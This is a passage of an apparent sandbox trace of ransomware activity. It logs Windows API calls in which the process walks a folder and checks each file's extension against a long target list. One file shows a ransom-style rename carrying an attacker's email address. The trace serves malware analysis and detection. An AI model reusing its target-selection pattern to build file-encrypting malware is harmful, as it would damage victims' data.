ftCreationTime.dwHighDateTime=0x1d53e4e, ftLastAccessTime.dwLowDateTime=0xd80b6bc0, ftLastAccessTime.dwHighDateTime=0x1d53e4e, ftLastWriteTime.dwLowDateTime=0xd80b6bc0, ftLastWriteTime.dwHighDateTime=0x1d53e4e, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0263.753] lstrlenW (lpString="desktop.ini") returned 11 [0263.753] lstrlenW (lpString=".1cd") returned 4 [0263.753] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0263.753] lstrlenW (lpString=".3ds") returned 4 [0263.753] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0263.753] lstrlenW (lpString=".3fr") returned 4 [0263.753] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0263.753] lstrlenW (lpString=".3g2") returned 4 [0263.753] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0263.753] lstrlenW (lpString=".3gp") returned 4 [0263.753] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0263.753] lstrlenW (lpString=".7z") returned 3 [0263.753] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0263.753] lstrlenW (lpString=".accda") returned 6 [0263.753] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0263.753] lstrlenW (lpString=".accdb") returned 6 [0263.753] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0263.753] lstrlenW (lpString=".accdc") returned 6 [0263.753] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0263.753] lstrlenW (lpString=".accde") returned 6 [0263.753] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0263.753] lstrlenW (lpString=".accdt") returned 6 [0263.753] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0263.753] lstrlenW (lpString=".accdw") returned 6 [0263.753] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0263.753] lstrlenW (lpString=".adb") returned 4 [0263.753] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0263.753] lstrlenW (lpString=".adp") returned 4 [0263.754] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0263.754] lstrlenW (lpString=".ai") returned 3 [0263.754] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0263.754] lstrlenW (lpString=".ai3") returned 4 [0263.754] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0263.754] lstrlenW (lpString=".ai4") returned 4 [0263.754] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0263.754] lstrlenW (lpString=".ai5") returned 4 [0263.754] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0263.754] lstrlenW (lpString=".ai6") returned 4 [0263.754] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0263.754] lstrlenW (lpString=".ai7") returned 4 [0263.754] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0263.754] lstrlenW (lpString=".ai8") returned 4 [0263.754] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0263.754] lstrlenW (lpString=".anim") returned 5 [0263.754] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0263.754] lstrlenW (lpString=".arw") returned 4 [0263.754] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0263.754] lstrlenW (lpString=".as") returned 3 [0263.754] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0263.754] lstrlenW (lpString=".asa") returned 4 [0263.754] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0263.754] lstrlenW (lpString=".asc") returned 4 [0263.754] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0263.754] lstrlenW (lpString=".ascx") returned 5 [0263.754] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0263.754] lstrlenW (lpString=".asm") returned 4 [0263.754] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0263.754] lstrlenW (lpString=".asmx") returned 5 [0263.755] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0263.755] lstrlenW (lpString=".asp") returned 4 [0263.755] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0263.755] lstrlenW (lpString=".aspx") returned 5 [0263.755] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0263.755] lstrlenW (lpString=".asr") returned 4 [0263.755] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0263.755] lstrlenW (lpString=".asx") returned 4 [0263.755] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0263.755] lstrlenW (lpString=".avi") returned 4 [0263.755] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0263.755] lstrlenW (lpString=".avs") returned 4 [0263.755] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0263.755] lstrlenW (lpString=".backup") returned 7 [0263.755] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0263.755] lstrlenW (lpString=".bak") returned 4 [0263.755] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0263.755] lstrlenW (lpString=".bay") returned 4 [0263.755] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0263.755] lstrlenW (lpString=".bd") returned 3 [0263.755] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0263.755] lstrlenW (lpString=".bin") returned 4 [0263.755] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0263.755] lstrlenW (lpString=".bmp") returned 4 [0263.755] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0263.755] lstrlenW (lpString=".bz2") returned 4 [0263.755] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0263.755] lstrlenW (lpString=".c") returned 2 [0263.755] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0263.755] lstrlenW (lpString=".cdr") returned 4 [0263.756] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0263.756] lstrlenW (lpString=".cer") returned 4 [0263.756] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0263.756] lstrlenW (lpString=".cf") returned 3 [0263.756] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0263.756] lstrlenW (lpString=".cfc") returned 4 [0263.756] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0263.756] lstrlenW (lpString=".cfm") returned 4 [0263.756] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0263.756] lstrlenW (lpString=".cfml") returned 5 [0263.756] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0263.756] lstrlenW (lpString=".cfu") returned 4 [0263.756] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0263.756] lstrlenW (lpString=".chm") returned 4 [0263.756] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0263.756] lstrlenW (lpString=".cin") returned 4 [0263.756] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0263.756] lstrlenW (lpString=".class") returned 6 [0263.756] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0263.756] lstrlenW (lpString=".clx") returned 4 [0263.756] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0263.756] lstrlenW (lpString=".config") returned 7 [0263.756] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0263.756] lstrlenW (lpString=".cpp") returned 4 [0263.756] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0263.756] lstrlenW (lpString=".cr2") returned 4 [0263.756] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0263.756] lstrlenW (lpString=".crt") returned 4 [0263.756] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0263.756] lstrlenW (lpString=".crw") returned 4 [0263.757] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0263.757] lstrlenW (lpString=".cs") returned 3 [0263.757] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0263.757] lstrlenW (lpString=".css") returned 4 [0263.757] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0263.757] lstrlenW (lpString=".csv") returned 4 [0263.757] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0263.757] lstrlenW (lpString=".cub") returned 4 [0263.757] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0263.757] lstrlenW (lpString=".dae") returned 4 [0263.757] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0263.757] lstrlenW (lpString=".dat") returned 4 [0263.757] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0263.757] lstrlenW (lpString=".db") returned 3 [0263.757] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0263.757] lstrlenW (lpString=".dbf") returned 4 [0263.757] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0263.757] lstrlenW (lpString=".dbx") returned 4 [0263.757] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0263.757] lstrlenW (lpString=".dc3") returned 4 [0263.757] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0263.757] lstrlenW (lpString=".dcm") returned 4 [0263.757] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0263.757] lstrlenW (lpString=".dcr") returned 4 [0263.757] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0263.757] lstrlenW (lpString=".der") returned 4 [0263.757] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0263.757] lstrlenW (lpString=".dib") returned 4 [0263.757] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0263.757] lstrlenW (lpString=".dic") returned 4 [0263.758] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0263.758] lstrlenW (lpString=".dif") returned 4 [0263.758] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0263.758] lstrlenW (lpString=".divx") returned 5 [0263.758] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0263.758] lstrlenW (lpString=".djvu") returned 5 [0263.758] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0263.758] lstrlenW (lpString=".dng") returned 4 [0263.758] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0263.758] lstrlenW (lpString=".doc") returned 4 [0263.758] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0263.758] lstrlenW (lpString=".docm") returned 5 [0263.758] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0263.758] lstrlenW (lpString=".docx") returned 5 [0263.758] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0263.758] lstrlenW (lpString=".dot") returned 4 [0263.758] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0263.758] lstrlenW (lpString=".dotm") returned 5 [0263.758] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0263.758] lstrlenW (lpString=".dotx") returned 5 [0263.758] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0263.758] lstrlenW (lpString=".dpx") returned 4 [0263.758] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0263.758] lstrlenW (lpString=".dqy") returned 4 [0263.758] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0263.758] lstrlenW (lpString=".dsn") returned 4 [0263.758] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0263.758] lstrlenW (lpString=".dt") returned 3 [0263.758] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0263.758] lstrlenW (lpString=".dtd") returned 4 [0263.759] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0263.759] lstrlenW (lpString=".dwg") returned 4 [0263.759] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0263.759] lstrlenW (lpString=".dwt") returned 4 [0263.759] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0263.759] lstrlenW (lpString=".dx") returned 3 [0263.759] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0263.759] lstrlenW (lpString=".dxf") returned 4 [0263.759] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0263.759] lstrlenW (lpString=".edml") returned 5 [0263.759] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0263.759] lstrlenW (lpString=".efd") returned 4 [0263.759] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0263.759] lstrlenW (lpString=".elf") returned 4 [0263.759] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0263.759] lstrlenW (lpString=".emf") returned 4 [0263.759] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0263.759] lstrlenW (lpString=".emz") returned 4 [0263.759] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0263.759] lstrlenW (lpString=".epf") returned 4 [0263.759] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0263.759] lstrlenW (lpString=".eps") returned 4 [0263.759] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0263.759] lstrlenW (lpString=".epsf") returned 5 [0263.759] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0263.759] lstrlenW (lpString=".epsp") returned 5 [0263.759] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0263.759] lstrlenW (lpString=".erf") returned 4 [0263.759] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0263.759] lstrlenW (lpString=".exr") returned 4 [0263.759] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0263.760] lstrlenW (lpString=".f4v") returned 4 [0263.760] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0263.760] lstrlenW (lpString=".fido") returned 5 [0263.760] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0263.760] lstrlenW (lpString=".flm") returned 4 [0263.760] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0263.760] lstrlenW (lpString=".flv") returned 4 [0263.760] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0263.760] lstrlenW (lpString=".frm") returned 4 [0263.760] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0263.760] lstrlenW (lpString=".fxg") returned 4 [0263.760] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1 [0263.760] lstrlenW (lpString=".geo") returned 4 [0263.760] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1 [0263.760] lstrlenW (lpString=".gif") returned 4 [0263.760] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0263.760] lstrlenW (lpString=".grs") returned 4 [0263.760] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1 [0263.760] lstrlenW (lpString=".gz") returned 3 [0263.760] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1 [0263.760] lstrlenW (lpString=".h") returned 2 [0263.760] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1 [0263.760] lstrlenW (lpString=".hdr") returned 4 [0263.760] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1 [0263.760] lstrlenW (lpString=".hpp") returned 4 [0263.760] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1 [0263.760] lstrlenW (lpString=".hta") returned 4 [0263.760] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1 [0263.760] lstrlenW (lpString=".htc") returned 4 [0263.760] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1 [0263.760] lstrlenW (lpString=".htm") returned 4 [0263.761] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0263.761] lstrlenW (lpString=".html") returned 5 [0263.761] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1 [0263.761] lstrlenW (lpString=".icb") returned 4 [0263.761] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1 [0263.761] lstrlenW (lpString=".ics") returned 4 [0263.761] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0263.761] lstrlenW (lpString=".iff") returned 4 [0263.761] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1 [0263.761] lstrlenW (lpString=".inc") returned 4 [0263.761] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1 [0263.761] lstrlenW (lpString=".indd") returned 5 [0263.761] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1 [0263.761] lstrlenW (lpString=".ini") returned 4 [0263.761] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0263.761] FindNextFileW (in: hFindFile=0x59a9c8, lpFindFileData=0x3bcf808 | out: lpFindFileData=0x3bcf808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x12827b30, ftCreationTime.dwHighDateTime=0x1d53e5f, ftLastAccessTime.dwLowDateTime=0x12827b30, ftLastAccessTime.dwHighDateTime=0x1d53e5f, ftLastWriteTime.dwLowDateTime=0x1284dc90, ftLastWriteTime.dwHighDateTime=0x1d53e5f, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id-9C354B42.[mr.hacker@tutanota.com].USA", cAlternateFileName="DESKTO~1.USA")) returned 1 [0263.761] lstrlenW (lpString="desktop.ini.id-9C354B42.[mr.hacker@tutanota.com].USA") returned 52 [0263.761] lstrlenW (lpString=".1cd") returned 4 [0263.761] lstrcmpiW (lpString1=".1cd", lpString2=".USA") returned -1 [0263.761] lstrlenW (lpString=".3ds") returned 4 [0263.761] lstrcmpiW (lpString1=".3ds", lpString2=".USA") returned -1 [0263.761] lstrlenW (lpString=".3fr") returned 4 [0263.761] lstrcmpiW (lpString1=".3fr", lpString2=".USA") returned -1 [0263.761] lstrlenW (lpString=".3g2") returned 4 [0263.761] lstrcmpiW (lpString1=".3g2", lpString2=".USA") returned -1 [0263.761] lstrlenW (lpString=".3gp") returned 4 [0263.761] lstrcmpiW (lpString1=".3gp", lpString2=".USA") returned -1 [0263.761] lstrlenW (lpString=".7z") returned 3 [0263.761] lstrcmpiW (lpString1=".7z", lpString2="USA") returned -1 [0263.762] lstrlenW (lpString=".accda") returned 6 [0263.762] lstrcmpiW (lpString1=".accda", lpString2="m].USA") returned -1 [0263.762] lstrlenW (lpString=".accdb") returned 6 [0263.762] lstrcmpiW (lpString1=".accdb", lpString2="m].USA") returned -1 [0263.762] lstrlenW (lpString=".accdc") returned 6 [0263.762] lstrcmpiW (lpString1=".accdc", lpString2="m].USA") returned -1 [0263.762] lstrlenW (lpString=".accde") returned 6 [0263.762] lstrcmpiW (lpString1=".accde", lpString2="m].USA") returned -1 [0263.762] lstrlenW (lpString=".accdt") returned 6 [0263.762] lstrcmpiW (lpString1=".accdt", lpString2="m].USA") returned -1 [0263.762] lstrlenW (lpString=".accdw") returned 6 [0263.762] lstrcmpiW (lpString1=".accdw", lpString2="m].USA") returned -1 [0263.762] lstrlenW (lpString=".adb") returned 4 [0263.762] lstrcmpiW (lpString1=".adb", lpString2=".USA") returned -1 [0263.762] lstrlenW (lpString=".adp") returned 4 [0263.762] lstrcmpiW (lpString1=".adp", lpString2=".USA") returned -1 [0263.762] lstrlenW (lpString=".ai") returned 3 [0263.762] lstrcmpiW (lpString1=".ai", lpString2="USA") returned -1 [0263.762] lstrlenW (lpString=".ai3") returned 4 [0263.762] lstrcmpiW (lpString1=".ai3", lpString2=".USA") returned -1 [0263.762] lstrlenW (lpString=".ai4") returned 4 [0263.762] lstrcmpiW (lpString1=".ai4", lpString2=".USA") returned -1 [0263.762] lstrlenW (lpString=".ai5") returned 4 [0263.762] lstrcmpiW (lpString1=".ai5", lpString2=".USA") returned -1 [0263.762] lstrlenW (lpString=".ai6") returned 4 [0263.762] lstrcmpiW (lpString1=".ai6", lpString2=".USA") returned -1 [0263.762] lstrlenW (lpString=".ai7") returned 4 [0263.762] lstrcmpiW (lpString1=".ai7", lpString2=".USA") returned -1 [0263.762] lstrlenW (lpString=".ai8") returned 4 [0263.762] lstrcmpiW (lpString1=".ai8", lpString2=".USA") returned -1 [0263.763] lstrlenW (lpString=".anim") returned 5 [0263.763] lstrcmpiW (lpString1=".anim", lpString2="].USA") returned -1 [0263.763] lstrlenW (lpString=".arw") returned 4 [0263.763] lstrcmpiW (lpString1=".arw", lpString2=".USA") returned -1 [0263.763] lstrlenW (lpString=".as") returned 3 [0263.763] lstrcmpiW (lpString1=".as", lpString2="USA") returned -1 [0263.763] lstrlenW (lpString=".asa") returned 4 [0263.763] lstrcmpiW (lpString1=".asa", lpString2=".USA") returned -1 [0263.763] lstrlenW (lpString=".asc") returned 4 [0263.763] lstrcmpiW (lpString1=".asc", lpString2=".USA") returned -1 [0263.763] lstrlenW (lpString=".ascx") returned 5 [0263.763] lstrcmpiW (lpString1=".ascx", lpString2="].USA") returned -1 [0263.763] lstrlenW (lpString=".asm") returned 4 [0263.763] lstrcmpiW (lpString1=".asm", lpString2=".USA") returned -1 [0263.763] lstrlenW (lpString=".asmx") returned 5 [0263.763] lstrcmpiW (lpString1=".asmx", lpString2="].USA") returned -1 [0263.763] lstrlenW (lpString=".asp") returned 4 [0263.763] lstrcmpiW (lpString1=".asp", lpString2=".USA") returned -1 [0263.763] lstrlenW (lpString=".aspx") returned 5 [0263.763] lstrcmpiW (lpString1=".aspx", lpString2="].USA") returned -1 [0263.763] lstrlenW (lpString=".asr") returned 4 [0263.763] lstrcmpiW (lpString1=".asr", lpString2=".USA") returned -1 [0263.763] lstrlenW (lpString=".asx") returned 4 [0263.763] lstrcmpiW (lpString1=".asx", lpString2=".USA") returned -1 [0263.763] lstrlenW (lpString=".avi") returned 4 [0263.763] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0263.763] lstrlenW (lpString=".avs") returned 4 [0263.763] lstrcmpiW (lpString1=".avs", lpString2=".USA") returned -1 [0263.763] lstrlenW (lpString=".backup") returned 7 [0263.763] lstrcmpiW (lpString1=".backup", lpString2="om].USA") returned -1 [0263.764] lstrlenW (lpString=".bak") returned 4 [0263.764] lstrcmpiW (lpString1=".bak", lpString2=".USA") returned -1 [0263.764] lstrlenW (lpString=".bay") returned 4 [0263.764] lstrcmpiW (lpString1=".bay", lpString2=".USA") returned -1 [0263.764] lstrlenW (lpString=".bd") returned 3 [0263.764] lstrcmpiW (lpString1=".bd", lpString2="USA") returned -1 [0263.764] lstrlenW (lpString=".bin") returned 4 [0263.764] lstrcmpiW (lpString1=".bin", lpString2=".USA") returned -1 [0263.764] lstrlenW (lpString=".bmp") returned 4 [0263.764] lstrcmpiW (lpString1=".bmp", lpString2=".USA") returned -1 [0263.764] lstrlenW (lpString=".bz2") returned 4 [0263.764] lstrcmpiW (lpString1=".bz2", lpString2=".USA") returned -1 [0263.764] lstrlenW (lpString=".c") returned 2 [0263.764] lstrcmpiW (lpString1=".c", lpString2="SA") returned -1 [0263.764] lstrlenW (lpString=".cdr") returned 4 [0263.764] lstrcmpiW (lpString1=".cdr", lpString2=".USA") returned -1 [0263.764] lstrlenW (lpString=".cer") returned 4 [0263.764] lstrcmpiW (lpString1=".cer", lpString2=".USA") returned -1 [0263.764] lstrlenW (lpString=".cf") returned 3 [0263.764] lstrcmpiW (lpString1=".cf", lpString2="USA") returned -1 [0263.764] lstrlenW (lpString=".cfc") returned 4 [0263.764] lstrcmpiW (lpString1=".cfc", lpString2=".USA") returned -1 [0263.764] lstrlenW (lpString=".cfm") returned 4 [0263.764] lstrcmpiW (lpString1=".cfm", lpString2=".USA") returned -1 [0263.764] lstrlenW (lpString=".cfml") returned 5 [0263.764] lstrcmpiW (lpString1=".cfml", lpString2="].USA") returned -1 [0263.764] lstrlenW (lpString=".cfu") returned 4 [0263.764] lstrcmpiW (lpString1=".cfu", lpString2=".USA") returned -1 [0263.764] lstrlenW (lpString=".chm") returned 4 [0263.764] lstrcmpiW (lpString1=".chm", lpString2=".USA") returned -1 [0263.764] lstrlenW (lpString=".cin") returned 4 [0263.765] lstrcmpiW (lpString1=".cin", lpString2=".USA") returned -1 [0263.765] lstrlenW (lpString=".class") returned 6 [0263.765] lstrcmpiW (lpString1=".class", lpString2="m].USA") returned -1 [0263.765] lstrlenW (lpString=".clx") returned 4 [0263.765] lstrcmpiW (lpString1=".clx", lpString2=".USA") returned -1 [0263.765] lstrlenW (lpString=".config") returned 7 [0263.765] lstrcmpiW (lpString1=".config", lpString2="om].USA") returned -1 [0263.765] lstrlenW (lpString=".cpp") returned 4 [0263.765] lstrcmpiW (lpString1=".cpp", lpString2=".USA") returned -1 [0263.765] lstrlenW (lpString=".cr2") returned 4 [0263.765] lstrcmpiW (lpString1=".cr2", lpString2=".USA") returned -1 [0263.765] lstrlenW (lpString=".crt") returned 4 [0263.765] lstrcmpiW (lpString1=".crt", lpString2=".USA") returned -1 [0263.765] lstrlenW (lpString=".crw") returned 4 [0263.765] lstrcmpiW (lpString1=".crw", lpString2=".USA") returned -1 [0263.765] lstrlenW (lpString=".cs") returned 3 [0263.765] lstrcmpiW (lpString1=".cs", lpString2="USA") returned -1 [0263.765] lstrlenW (lpString=".css") returned 4 [0263.765] lstrcmpiW (lpString1=".css", lpString2=".USA") returned -1 [0263.765] lstrlenW (lpString=".csv") returned 4 [0263.765] lstrcmpiW (lpString1=".csv", lpString2=".USA") returned -1 [0263.765] lstrlenW (lpString=".cub") returned 4 [0263.765] lstrcmpiW (lpString1=".cub", lpString2=".USA") returned -1 [0263.765] lstrlenW (lpString=".dae") returned 4 [0263.765] lstrcmpiW (lpString1=".dae", lpString2=".USA") returned -1 [0263.765] lstrlenW (lpString=".dat") returned 4 [0263.765] lstrcmpiW (lpString1=".dat", lpString2=".USA") returned -1 [0263.765] lstrlenW (lpString=".db") returned 3 [0263.765] lstrcmpiW (lpString1=".db", lpString2="USA") returned -1 [0263.765] lstrlenW (lpString=".dbf") returned 4 [0263.766] lstrcmpiW (lpString1=".dbf", lpString2=".USA") returned -1 [0263.766] lstrlenW (lpString=".dbx") returned 4 [0263.766] lstrcmpiW (lpString1=".dbx", lpString2=".USA") returned -1 [0263.766] lstrlenW (lpString=".dc3") returned 4 [0263.766] lstrcmpiW (lpString1=".dc3", lpString2=".USA") returned -1 [0263.766] lstrlenW (lpString=".dcm") returned 4 [0263.766] lstrcmpiW (lpString1=".dcm", lpString2=".USA") returned -1 [0263.766] lstrlenW (lpString=".dcr") returned 4 [0263.766] lstrcmpiW (lpString1=".dcr", lpString2=".USA") returned -1 [0263.766] lstrlenW (lpString=".der") returned 4 [0263.766] lstrcmpiW (lpString1=".der", lpString2=".USA") returned -1 [0263.766] lstrlenW (lpString=".dib") returned 4 [0263.766] lstrcmpiW (lpString1=".dib", lpString2=".USA") returned -1 [0263.766] lstrlenW (lpString=".dic") returned 4 [0263.766] lstrcmpiW (lpString1=".dic", lpString2=".USA") returned -1 [0263.766] lstrlenW (lpString=".dif") returned 4 [0263.766] lstrcmpiW (lpString1=".dif", lpString2=".USA") returned -1 [0263.766] lstrlenW (lpString=".divx") returned 5 [0263.766] lstrcmpiW (lpString1=".divx", lpString2="].USA") returned -1 [0263.766] lstrlenW (lpString=".djvu") returned 5 [0263.766] lstrcmpiW (lpString1=".djvu", lpString2="].USA") returned -1 [0263.766] lstrlenW (lpString=".dng") returned 4 [0263.766] lstrcmpiW (lpString1=".dng", lpString2=".USA") returned -1 [0263.766] lstrlenW (lpString=".doc") returned 4 [0263.766] lstrcmpiW (lpString1=".doc", lpString2=".USA") returned -1 [0263.766] lstrlenW (lpString=".docm") returned 5 [0263.766] lstrcmpiW (lpString1=".docm", lpString2="].USA") returned -1 [0263.766] lstrlenW (lpString=".docx") returned 5 [0263.766] lstrcmpiW (lpString1=".docx", lpString2="].USA") returned -1 [0263.766] lstrlenW (lpString=".dot") returned 4 [0263.767] lstrcmpiW (lpString1=".dot", lpString2=".USA") returned -1 [0263.767] lstrlenW (lpString=".dotm") returned 5 [0263.767] lstrcmpiW (lpString1=".dotm", lpString2="].USA") returned -1 [0263.767] lstrlenW (lpString=".dotx") returned 5 [0263.767] lstrcmpiW (lpString1=".dotx", lpString2="].USA") returned -1 [0263.767] lstrlenW (lpString=".dpx") returned 4 [0263.767] lstrcmpiW (lpString1=".dpx", lpString2=".USA") returned -1 [0263.767] lstrlenW (lpString=".dqy") returned 4 [0263.767] lstrcmpiW (lpString1=".dqy", lpString2=".USA") returned -1 [0263.767] lstrlenW (lpString=".dsn") returned 4 [0263.767] lstrcmpiW (lpString1=".dsn", lpString2=".USA") returned -1 [0263.767] lstrlenW (lpString=".dt") returned 3 [0263.767] lstrcmpiW (lpString1=".dt", lpString2="USA") returned -1 [0263.767] lstrlenW (lpString=".dtd") returned 4 [0263.767] lstrcmpiW (lpString1=".dtd", lpString2=".USA") returned -1 [0263.767] lstrlenW (lpString=".dwg") returned 4 [0263.767] lstrcmpiW (lpString1=".dwg", lpString2=".USA") returned -1 [0263.767] lstrlenW (lpString=".dwt") returned 4 [0263.767] lstrcmpiW (lpString1=".dwt", lpString2=".USA") returned -1 [0263.767] lstrlenW (lpString=".dx") returned 3 [0263.767] lstrcmpiW (lpString1=".dx", lpString2="USA") returned -1 [0263.767] lstrlenW (lpString=".dxf") returned 4 [0263.767] lstrcmpiW (lpString1=".dxf", lpString2=".USA") returned -1 [0263.767] lstrlenW (lpString=".edml") returned 5 [0263.767] lstrcmpiW (lpString1=".edml", lpString2="].USA") returned -1 [0263.767] lstrlenW (lpString=".efd") returned 4 [0263.767] lstrcmpiW 